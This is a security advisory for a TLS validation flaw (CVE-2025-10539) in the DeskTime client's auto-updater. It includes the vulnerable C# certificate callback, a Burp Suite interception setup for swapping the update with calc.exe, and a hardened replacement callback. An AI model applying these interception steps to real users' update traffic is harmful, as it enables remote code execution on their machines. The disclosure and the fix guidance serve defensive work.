# Vulnerability Summary: Missing TLS Certificate Validation leading to RCE (CVE-2025-10539)

## Vulnerability Overview

**CVE-2025-10539**: Because the DeskTime client does not correctly validate the TLS certificate of the update server, an attacker positioned on the network path between the client and the update server can answer an update request with a malicious executable, which the client then runs, giving the attacker user-level code execution (RCE) on the client.

## Impact Scope

- **Affected Version**: 1.3.671 (latest version at time of testing)
- **Trigger Condition**: The updater runs automatically every hour, so no user interaction is required

## Remediation

- **Fixed Version**: v1.3.674
- **Release Date**: 2026-04-28
- **Download URL**: https://desktime.com/download

## Proof of Concept (POC)

### 1. Certificate Validation Code Snippet

The callback accepts any certificate whose only chain error is an untrusted root, which is exactly the situation a self-signed interception certificate produces:

```csharp
// Certificate validation callback (vulnerable version, as found in 1.3.671)
private bool CheckCertificate(object sender, X509Certificate certificate,
    X509Chain chain, SslPolicyErrors sslPolicyErrors)
{
    if (sslPolicyErrors == SslPolicyErrors.None)
        return true;

    if (sslPolicyErrors == SslPolicyErrors.RemoteCertificateChainErrors)
    {
        // Accepts the certificate when the only chain problem is an untrusted root,
        // i.e. any self-signed certificate for the hostname passes this check
        if (chain.ChainStatus.Length == 1 &&
            chain.ChainStatus[0].Status == X509ChainStatusFlags.UntrustedRoot)
            return true;
    }

    return false;
}
```

### 2. Burp Suite Listener Settings

```
Redirect to host: desktime.com
Redirect to port: 443
☑ Force use of TLS
☑ Support invisible proxying (enable only if needed)
```

### 3. Burp DNS Override Settings

```
Hostname: desktime.com
IP Address: 127.0.0.1
```

### 4. Update Request Example

```http
GET /api/v1/updates?version=1.3.671&os=windows&arch=x64&user_id=xxx HTTP/1.1
Host: desktime.com
Accept-Encoding: gzip, deflate, br
Connection: Close
```

### 5. Update Response Example

```json
{
  "version": "1.3.674",
  "url": "https://desktime.com/updates/win/update.exe"
}
```

### 6. Burp Replacement Rule

```
Match:   "version":"1.3.671"
Replace: "version":"1.3.674"
```

### 7. Malicious Update File

Substitute `calc.exe` for the genuine updater in the response; the client executes it automatically the next time it checks for updates.
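For comparison with the vulnerable callback in section 1, the following is a hardened version with the same `RemoteCertificateValidationCallback` signature. It is an example written for this summary, not DeskTime's code or its actual fix in v1.3.674. It assumes .NET (Framework 4.7.1+ or .NET Core/5+) and uses a placeholder pin value (`UpdateServerCertSha256`) that an operator would replace with the SHA-256 hash of the real update server certificate.

```csharp
using System;
using System.Net;
using System.Net.Http;
using System.Net.Security;
using System.Security.Cryptography;
using System.Security.Cryptography.X509Certificates;

// Added example: hardened replacement for the CheckCertificate callback.
// Not DeskTime's code. UpdateServerCertSha256 is a placeholder value.
public static class UpdateTls
{
    // Placeholder: SHA-256 hash (uppercase hex) of the update server's certificate.
    private const string UpdateServerCertSha256 = "PLACEHOLDER_SHA256_HEX";

    // Same signature as RemoteCertificateValidationCallback, so it can be wired
    // in wherever the original CheckCertificate was.
    public static bool CheckCertificateHardened(object sender, X509Certificate certificate,
        X509Chain chain, SslPolicyErrors sslPolicyErrors)
    {
        // 1. Reject any policy error. The vulnerable version returned true for
        //    RemoteCertificateChainErrors when the only status was UntrustedRoot,
        //    which is precisely what a self-signed interception certificate yields.
        if (sslPolicyErrors != SslPolicyErrors.None || certificate == null)
            return false;

        // 2. Defence in depth: pin the server certificate so that even a CA-issued
        //    certificate for desktime.com is rejected unless it is the expected one.
        return string.Equals(Sha256Hex(certificate.GetRawCertData()),
            UpdateServerCertSha256, StringComparison.OrdinalIgnoreCase);
    }

    // Hex-encoded SHA-256 of the DER certificate bytes (portable across frameworks).
    public static string Sha256Hex(byte[] der)
    {
        using (var sha = SHA256.Create())
        {
            return BitConverter.ToString(sha.ComputeHash(der)).Replace("-", "");
        }
    }

    // Wiring for the two common client stacks.
    public static void Install()
    {
        // Legacy WebRequest/WebClient path (process-wide).
        ServicePointManager.ServerCertificateValidationCallback = CheckCertificateHardened;
    }

    public static HttpClientHandler CreateHandler()
    {
        // HttpClient path: adapt the same check to the handler's callback signature.
        var handler = new HttpClientHandler();
        handler.ServerCertificateCustomValidationCallback =
            (request, cert, chain, errors) => CheckCertificateHardened(request, cert, chain, errors);
        return handler;
    }
}
```

Step 1 alone (returning `false` for anything other than `SslPolicyErrors.None`) closes the interception described in this summary; simplest of all is to not register a custom callback and let the platform's default validation run. The pin in step 2 is optional and carries an operational cost: it must be rotated before the server certificate changes, or the updater will stop working. Independently of TLS, verifying the Authenticode signature and publisher of the downloaded executable before running it would stop a swapped update file even if the transport were compromised.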